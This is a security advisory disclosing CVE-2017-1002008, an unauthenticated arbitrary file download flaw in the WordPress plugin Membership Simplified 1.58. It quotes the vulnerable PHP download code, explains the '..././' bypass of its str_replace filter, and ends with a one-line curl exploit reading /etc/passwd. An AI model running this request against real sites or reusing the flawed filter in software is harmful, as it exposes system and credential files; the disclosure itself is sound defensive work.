WordPress Membership Simplified 1.58 Arbitrary File Download

Related Vulnerabilities: CVE-2017-1002008  
Publish Date: 16 Mar 2017
                							

                Title: Arbitrary file download vulnerability in Wordpress Plugin Membership Simplified v1.58
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-13
CVE-ID:[CVE-2017-1002008]
Download Site: https://wordpress.org/plugins/membership-simplified-for-oap-members-only
Vendor: https://profiles.wordpress.org/williamdeangelis/
Vendor Notified: 2017-03-13
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=187
Description: Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.
Vulnerability:
The file download code located membership-simplified-for-oap-members-only/download.php does not check whether a user is logged in and has download privledges, the code on line 5 that checks the path can be defeated by using a ..././ pattern to get the desired ../ after being passed through the str_replace() function:

 3 $path = substr(getcwd(), 0, -50). "uploads/membership-simplified-for-oap-members-only/"; // change the path to fit your websites document structure
  4 $fullPath = $path.$_GET['download_file'];
  5 $fullPath = str_replace("../","",$fullPath);
  6 
  7 if ($fd = fopen($fullPath, "r")) {
  8     $fsize = filesize($fullPath);
  9     $path_parts = pathinfo($fullPath);
 10     $ext = strtolower($path_parts["extension"]);
 11     switch ($ext) {
 12         case "pdf":
 13         header("Content-type: application/pdf"); // add here more headers for d    iff. extensions
 14         header("Content-Disposition: attachment; filename=\"".$path_parts["base    name"]."\""); // use 'attachment' to force a download
 15         break;
 16         default;
 17         header("Content-type: application/octet-stream");
 18         header("Content-Disposition: filename=\"".$path_parts["basename"]."\"")    ;
 19     }
 20     header("Content-length: $fsize");
 21     header("Cache-control: private"); //use this to open files directly
 22     while(!feof($fd)) {
 23         $buffer = fread($fd, 2048);
 24         echo $buffer;

Export: JSON TEXT XML
Exploit Code:
  aC/ $ curl http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd
  aC/  
<p>